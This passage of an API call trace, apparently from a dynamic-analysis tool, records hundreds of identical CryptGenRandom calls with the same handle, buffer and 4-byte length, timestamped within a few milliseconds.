CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.357] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.358] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 